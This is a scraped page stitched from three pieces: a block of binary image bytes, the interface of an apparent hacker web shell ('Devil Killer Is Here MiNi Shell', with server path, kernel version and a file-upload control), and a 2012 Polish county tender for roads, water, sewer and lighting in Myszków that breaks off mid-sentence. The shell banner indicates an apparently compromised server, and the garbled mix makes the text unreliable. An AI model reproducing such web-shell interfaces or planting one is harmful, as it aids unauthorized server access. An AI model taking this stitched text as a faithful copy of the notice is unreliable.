JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121018/221903-N-2012.html

<p class="kh_header"><b>Myszków: Zaprojektowanie i wybudowanie zadania pn. Rewitalizacja terenów popegeerowskich z przeznaczeniem na strefę aktywności gospodarczej na terenie powiatu myszkowskiego</b><br>
<b>Numer ogłoszenia: 221903 - 2012; data zamieszczenia: 18.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Myszkowski reprezentowany przez Zarząd Powiatu w Myszkowie , ul. Pułaskiego 6, 42-300 Myszków, woj. śląskie, tel. 034 3159100, faks 034 3159160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatmyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wybudowanie zadania pn. Rewitalizacja terenów popegeerowskich z przeznaczeniem na strefę aktywności gospodarczej na terenie powiatu myszkowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest zadanie inwestycyjne pn. Zaprojektowanie
 i wybudowanie zadania, pn. Rewitalizacja terenów popegeerowskich z przeznaczeniem na strefę aktywności gospodarczej na terenie powiatu myszkowskiego współfinansowane ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego dla Województwa Śląskiego na lata 2007 - 2013, Priorytet  6   Zrównoważony Rozwój Miast, Działanie  6.2. Rewitalizacja obszarów zdegradowanych, Poddziałanie 6.2.2 Rewitalizacja - małe miasta.

Przedmiotowe zamówienie realizowane jest w systemie zaprojektuj i wybuduj.

Przedmiotowy projekt to zrewitalizowanie 42 ha powierzchni pól popegeerowskich poprzez zagospodarowanie i uzbrojenie terenu zgodnie z opracowanym programem funkcjonalno-użytkowym  stanowiącym załącznik nr 10 do SIWZ. 

4.2 Opis przedsięwzięcia:
Teren inwestycji zlokalizowany jest w Myszkowie w obrębie dzielnicy Mijaczów i Pustkowie Mijaczowskie, Ograniczony jest ul. Jesionową, ul. Pułaskiego, terenami przy Urzędzie Skarbowym, rowem melioracyjnym, terenami ogródków działkowych i terenem Okręgowej Spółdzielni Mleczarskiej. Teren opracowania objęty jest Miejscowym Planem Zagospodarowania Przestrzennego. Planowana rewitalizacja będzie prowadzona w kierunku  zagospodarowania i uzbrojenia terenu  przeznaczonego pod działki  inwestycyjne a  tym samym uzyskania nowych wartości w postaci dróg dojazdowych ,wewnętrznych, chodników, sieci instalacyjnych ( wod-kan., oświetlenie ) oraz zieleni w pasach rozgraniczających. Zakłada się, że koncepcja programowo przestrzenna (program funkcjonalno-użytkowy z załącznikiem) i projekty budowlano-wykonawcze  będą  rozwiązywały zagadnienia zagospodarowania terenów popegeerowskich w sposób zoptymalizowany dla każdej działki. Zostaną  uwzględnione takie elementy jak stopień  przekształcenia terenu, jego cechy geotechniczne i szereg innych uwarunkowań  decydujących o uzyskaniu zamierzonego celu. Zostaną także rozwiązane i podane zagadnienia wykonawcze (technologia prowadzenia prac), również dostosowane dla przedmiotowego terenu Pomimo niezbędnej indywidualizacji będzie zachowana zasada spójności projektowania w celu osiągnięcia zamierzonego celu. W wyniku realizacji projektu powstanie  18 działek budowlanych przeznaczonych pod zabudowę usługową,  produkcyjno-usługową, składów i magazynów. Przedmiotowa inwestycja ma zagwarantować funkcjonowanie terenów przemysłowych i usługowych  poprzez  zapewnienie  dojazdu oraz infrastruktury technicznej - uzbrojenia terenu. 

4.3 Podstawowy zakres robót obejmuje kompleksową realizację zaprojektowania i budowy zleconego  zadania inwestycyjnego za pomocą środków własnych lub zewnętrznych  w tym :

4.3.1 Dokumentacja techniczna
1 .Wykonanie niezbędnych badań geotechnicznych, geologicznych
2.Wykonanie mapy do celów projektowych,
3.Wypis i wyrys z Miejscowego Planu Zagospodarowania Przestrzennego
4.Wykonanie niezbędnych opracowań i uzyskania wymaganych prawem decyzji (np. decyzja środowiskowa, pozwolenie wodno-prawne itp.)
5.Innych dokumentów zgodnie z obowiązującym prawem niezbędnych do                           zaprojektowania i uzyskania pozwolenia na budowę,
6.Wykonanie projektów : budowlanego i wykonawczego, 
7.Specyfikacji technicznej wykonania i odbioru robót ,przez którą należy rozumieć opracowanie zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru ,
8.Projekt organizacji ruchu na czas budowy i docelowy , uzgodniony i zatwierdzony  z administratorem drogi i Policją,
9.Uzyskanie wymaganych prawem, zatwierdzeń, uzgodnień, opinii i  ewentualnych ekspertyz wraz z pozwoleniem na budowę włącznie,
10.Wykonanie opracowań kosztowych( przedmiary robót i kosztorysy inwestorskie z podziałem na zadania),
 11.Harmonogram realizacji i finansowania (HRF),
 12. Plan BIOZ - plan bezpieczeństwa o ochrony zdrowia,

Wymagania Zamawiającego
1 .Opracowana dokumentacja ma obejmować dokonanie wszelkich wymaganych prawem zatwierdzeń, uzgodnień, opinii i  ewentualnych ekspertyz, uzyskanie pozwolenia na budowę, a także winna umożliwiać:
         a) Dokumentacja projektowo - kosztorysowa ma być wykonana zgodnie 
z   obowiązującymi przepisami prawa,                                                                                        b)  wykonanie wszelkich robót budowlanych niezbędnych do zrealizowania
 i funkcjonowania projektowanej rewitalizacji terenu
2. Zakres dokumentacji do wykonania:                                                                                                                   a) dokumentacja geotechniczna terenu przeznaczonego pod inwestycje - 5egz.,                                              b) projekt odwodnienia (w przypadku konieczności wynikającej z dokumentacji geotechnicznej) terenu wraz z niezbędnymi uzgodnieniami i pozwoleniami - 5 egz.,                                                                c) - projekt budowlany obejmujący wszystkie branże wraz z przyłączami mediów, w tym projekt zagospodarowania terenu uwzględniający-zaakceptowaną wersję graficzną do programu funkcjonalno-użytkowego- oraz lokalizacje wszystkich projektowanych obiektów wraz  z niezbędnymi elementami towarzyszącymi - 5 egz.,                                                                                          d) - projekt wykonawczy obejmujący wszystkie branże wraz z przyłączami mediów                        - 5 egz.,                                                                                                                                                 e) - specyfikacja techniczna wykonania i odbioru robót - 4 egz.,                                                                    f) - informacja dotycząca bezpieczeństwa i ochrony zdrowia - 4 egz.,                                                               g) - przedmiary robót (dla każdej branży oddzielnie) - 4 egz.,                                                                             h) - kosztorysy inwestorskie (dla każdej branży oddzielnie) - 4 egz.,                                                                 i) - płyta CD zawierająca skany całej w/w dokumentacji (2 szt.), w tym jedna bez kosztorysów( opracowana w PDF i DWG jak również edytowalna wersja dla kosztorysów i przedmiarów),                                                                                                                                     j) - wykaz opracowań oraz pisemne oświadczenie, że dostarczona dokumentacja projektowo - kosztorysowa jest wykonana zgodnie z umową, ofertą, obowiązującymi przepisami   techniczno - budowlanymi, zasadami wiedzy technicznej oraz normami, że zostaje wydana  w stanie pełnym, kompletnym z punktu widzenia celu któremu ma służyć. Pisemne  oświadczenie, o którym mowa wyżej, stanowi integralna część przedmiotu odbioru, oświadczenie o zgodności i kompletności dokumentacji w wersji papierowej i wersji elektronicznej.                                                                                                                                                           
3. Wykonanie postanowień umowy - rozumie sie jako kompleksowe w świetle prawa                               i przepisów.                                                                                                                                                              
4. O zrealizowaniu w całości przedmiotowej dokumentacji stanowią:  wykonanie przez Wykonawcę w sposób opisany w SIWZ wszystkich opracowań dokumentacyjnych, pisemna akceptacja przez Zamawiającego opracowań dokumentacyjnych, oraz usunięcie usterek i wad przez Wykonawcę.

Wymagania szczegółowe Zamawiającego dotyczące opracowań dokumentacyjnych
1. Dokumentacja geotechniczna terenu przeznaczonego pod inwestycje.                                                              1) Do dokumentacji geotechnicznej poza częścią tekstowa zawierająca miedzy innymi wnioski  i zalecenia ma być dołączona mapa z zaznaczonymi miejscami badan oraz przekroje geotechniczne.                                                                                                                                                            2) Przekroje geotechniczne maja ilustrować budowę geologiczną podłoża (przebiegi warstw gruntu, rodzaje gruntów, informacje o poziomie wody gruntowej).
 3) Integralna częścią dokumentacji ma być tabela zawierająca wartości parametrów geotechnicznych dla wszystkich nośnych warstw gruntów występujących w badanym podłożu.                                                                                                                                             4) W przypadku konieczności odwodnienia terenu, wynikającego z dokumentacji  geotechnicznej, wykonawca zobowiązany jest wykonać projekt odwodnienia terenu na którym zlokalizowana jest inwestycja wraz z odprowadzeniem do istniejącego rowu oraz uzyskać niezbędne uzgodnienia i pozwolenia dla rozwiązań projektowych.

2 .  Projekt budowlany.                                                                                                                              Projekt budowlany ma obejmować swoim zakresem wszystkie branże wraz z przyłączami mediów, w tym projekt zagospodarowania terenu uwzględniający lokalizacje wszystkich projektowanych obiektów wraz z niezbędnymi elementami towarzyszącymi .                                                                                                                           1) Do projektu budowlanego należy dołączyć oświadczenie projektanta oraz oświadczenie sprawdzającego o sporządzeniu projektu budowlanego zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej.                                                                                                                        2) Projekt budowlany winien obejmować swoim zakresem również zabezpieczenie i ewentualną przebudowę kolidujących urządzeń infrastruktury technicznej.                                                                       3) Zamawiający wymaga ponadto ,żeby zamawiane egzemplarze dokumentacji nie różniły się zawartością i kolejnością wpięcia dokumentów. cztery egzemplarze należy oprawić trwale (w tym egzemplarz archiwalny), natomiast jeden w sposób umożliwiający wyjmowanie arkuszy. Ponadto w związku z zamówieniem 5 egzemplarzy z których dwa będą ostemplowane przez Organ Administracji Architektoniczno - Budowlanej wymaga, aby kolejny 1 egzemplarz był kserokopią egzemplarza archiwalnego i potwierdzony za zgodność z oryginałem. Ponadto płyta CD również winna być skanem egzemplarza archiwalnego z wszystkimi niezbędnymi uzgodnieniami i pieczęciami Organu Administracji Architektoniczno - Budowlanej. 
3 .Projekt wykonawczy.                                                                                                                                   Projekt wykonawczy swoim zakresem ma obejmować wszystkie branże wraz z przyłączami mediów. Celem tego opracowania projektowego jest uzyskanie niezbędnych danych dla potrzeb wykonania, odbioru i rozliczenia robót budowlanych. Projekty wykonawcze powinny obejmować swoim zakresem również zabezpieczenie i ewentualna przebudowę kolidujących urządzeń infrastruktury technicznej. Do projektu wykonawczego należy dołączyć oświadczenie Projektanta oraz oświadczenie sprawdzającego o sporządzeniu dokumentacji zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej.
4 .Przedmiary robót.
Przedmiary robót należy wykonać dla wszystkich robót objętych dokumentacją projektową (dla każdej branży oddzielnie), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004r.w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004r.Nr 202, poz. 2072 z późn. zm.).
 5 .Specyfikacja techniczna wykonania i odbioru robót.                                                                  Szczegółowa specyfikacje techniczna wykonania i odbioru robót (SST) obejmująca wszystkie branże należy wykonać zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2004r. Nr 202,poz. 2072 z późn. zm.). SST powinna zawierać szczegółowe wymagania dla wykonawcy robót w zakresie: sprzętu, materiałów, transportu, wykonania robót, kontroli jakości robót, obmiarów robót, odbiorów robót i podstaw płatności za roboty. SST musi dotyczyć zakresu robót objętych dokumentacją projektową i uwzględniać warunki techniczno - budowlane, normy i przepisy.
6 .Informacja dotycząca bezpieczeństwa i ochrony zdrowia.                                                            Informacje należy opracować zgodnie z Rozporządzeniem  Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U.2003r. Nr 120, poz. 1126).
7 .Kosztorys inwestorski                                                                                                                         Kosztorys inwestorski sporządzony dla każdej branży oddzielnie powinien odpowiadać   m.in. wymaganiom określonym w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. 2004r. Nr 130, poz. 1389).
8 .Wersja elektroniczna dokumentacji na CD                                                                                     Wykonawca złoży oświadczenie, że przekazana wersja elektroniczna na CD jest odzwierciedleniem dokumentacji projektowo-kosztorysowej w wersji papierowej. Ponadto płyta CD winna być złożona w 2 egzemplarzach różniących sie zawartością i oznaczeniem tych egzemplarzy. Jeden egzemplarz Inwestorski - pełny, drugi egzemplarz Roboczy pozbawiony kosztorysów inwestorskich. Kosztorysy i przedmiary maja być opracowane w jednym z popularnych programów kosztorysowych. Każda branża dokumentacji w oddzielnym pliku PDF i DWG oraz edytowalnej wersji kosztorysy i przedmiary, z uwagi na cześć graficzna dokumentacji dopuszcza sie zamieszczenie rysunków w odrębnych plikach PDF.
 9 .Wymagania dodatkowe dla Wykonawcy                                                                                                         1) Dokumentacja techniczna ma zawierać wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów.                                                                                                                            2) Wszystkie opracowania branżowe i kosztorysowe maja być podpisane przez osoby je wykonujące.                                                                                                                                                             3) Wykonawca zapewni opracowanie wszelkiej dokumentacji z należyta starannością wraz z dokonaniem uzgodnień branżowych oraz dostosowanie jej do obowiązujących w danym czasie przepisów, a w szczególności:                                                                                                                                a) - ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2010 r., Nr 243 poz. 1623, - tekst jednolity z późn. zm.),                                                                                                   b) - rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r.  w sprawie szczegółowego zakresu i formy projektu budowlanego   (Dz.U. 2012, Nr 462) 
 c)- rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. z 2004r. Nr 202,poz. 2072 z późn. zm.). 
d)- rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym użytkowym (Dz.U. 2004r. Nr 130, poz. 1389) obowiązującymi normami oraz zasadami wiedzy technicznej.
        
4.3.2 Roboty budowlano - instalacyjne
 1. Zapewnienie obsługi geodezyjnej dla całości zadania inwestycyjnego,
2. Wykonanie dróg wewnętrznych wraz z jednostronnym chodnikiem i odwodnieniem do  nieutwardzonych rowów przydrożnych oraz zieleni w pasach rozgraniczających (zgodnie z obowiązującymi przepisami i warunkami technicznymi),
3. Wykonanie dróg dojazdowych,
4. Wykonanie uzbrojenia terenu (sieć wodną ,kanalizację sanitarną i deszczową wraz z towarzyszącymi urządzeniami technicznymi),
5. Wykonanie oświetlenia dróg wraz z zasilaniem elektroenergetycznym,
6. Wykonanie dokumentacji powykonawczej oraz operatu kolaudacyjnego,
7.Uzyskanie pozwolenia na użytkowanie odpowiednio do wymagań Ustawy -Prawo  budowlane 

REALIZACJA PROJEKTU 
Właściwą realizacją  projektu  jest wykonanie robót budowlanych prowadzących docelowo do zagospodarowania terenu poprzez utworzenie dróg dojazdowych, dróg wewnętrznych wraz z jednostronnym chodnikiem i odwodnieniem do nieutwardzonych rowów przydrożnych oraz zieleni w pasach rozgraniczających ,oznakowanie pionowe i poziome dróg, uzbrojenie terenu (sieć wodna, kanalizacja sanitarna), oświetlenia dróg wraz z zasilaniem elektroenergetycznym, pełnienie nadzoru autorskiego podczas realizacji zadania.

Zakres prac budowlanych:
 1) drogi  dojazdowe
  - droga dojazdowa do ulicy Szpitalnej  długość  506mb  szerokość 5mb  (dwa pasy jezdni po 2,5mb wykonane z płyt drogowych betonowych na odcinku poza granicami opracowania graficznego określonego w programie funkcjonalno-użytkowym)
2)  drogi wewnętrzne wraz z jednostronnym chodnikiem i odwodnieniem do nieutwardzonych rowów przydrożnych oraz zieleni w pasach rozgraniczających
- długość dróg i chodnika na terenie inwestycji   = 1561mb o szerokości 7mb
     (dwa pasy jezdni po 3.5 mb  + jednostronny chodnik o szerokości 2,5mb  )
3)  Wykonanie uzbrojenia terenu 
 -  długość sieci wodnej  1658 mb + dodatkowo 500 mb w pasie ulicy Pułaskiego
Alternatywnym rozwiązaniem jest podłączenie  do studni głębinowej zlokalizowanej na terenie  inwestycji,
-  długość sieci kanalizacji sanitarnej 1658mb ze zrzutem do istniejącej oczyszczalni w rejonie Spółdzielni mleczarskiej
4)  oświetlenie dróg wraz z zasilaniem elektroenergetycznym,
-  długość linii zasilającej - 1611mb,
- ilość słupów oświetleniowych  55 kpl. (wysokość 10m w rozstawie co 30m)


OPIS  WYMAGAŃ  ZAMAWIAJACEGO  W  STOSUNKU  DO  PRZEDMIOTU ZAMÓWIENIA  ORAZ  CZĘŚĆ  INFORMACYJNA   ZOSTAŁY  ZAWARTE  W OPRACOWANYM  PROGRAMIE  FUNKCJONALNO-UŻYTKOWYM  STANOWIĄCYM ZAŁACZNIK  NR 10 DO  NINIEJSZEGO  SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.12.91-4, 45.23.31.20-6, 45.23.32.22-1, 45.23.11.00-6, 45.23.14.00-9, 45.23.13.00-8, 71.22.10.00-3, 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 100.000,00 zł (słownie: sto tysięcy złotych).
2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych 
w art. 45 ust. 6 ustawy Pzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:



                                Starostwo Powiatowe w Myszkowie 
              Bank   BGŻ  SA/O Częstochowa     Nr 64 2030 0045 1110 0000 0174 9900
        podając nazwę wpłacającego oraz informacje czego wpłata dotyczy:
        Wadium-rewitalizacja terenów popegeerowskich

        Kserokopię polecenia przelewu potwierdzoną za zgodność z oryginałem przez  Wykonawcę należy dołączyć do oferty.
5.	Wadium wniesione w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert, tj. do dnia 05.11.2012 r. do godz. 10 00 . W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest warunkiem koniecznym, ale niewystarczającym do stwierdzenia przez zamawiającego terminowego wniesienia wadium przez wykonawcę.
6.	Wadium w innej formie niż pieniądz należy złożyć przed upływem terminu składania ofert            w formie oryginału w KASIE Starostwa Powiatowego w Myszkowie na Sali Obsługi Interesantów, Starostwo Powiatowe w Myszkowie, 42 - 300 Myszków,  ul. Pułaskiego 6, a kserokopię wniesienia wadium potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu wykonawcy dołączyć do oferty.
7.	Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
8.	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
9.	Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.
10.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a art.46 ustawy PZP.
11.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
12.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
14.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
15.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń,                o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to                z przyczyn  nieleżących po jego stronie.
16.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta  została wybrana:
   1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach      określonych w ofercie;
        2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b.1) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 2 prace (prace zakończone), z których każda polegała na wykonaniu:
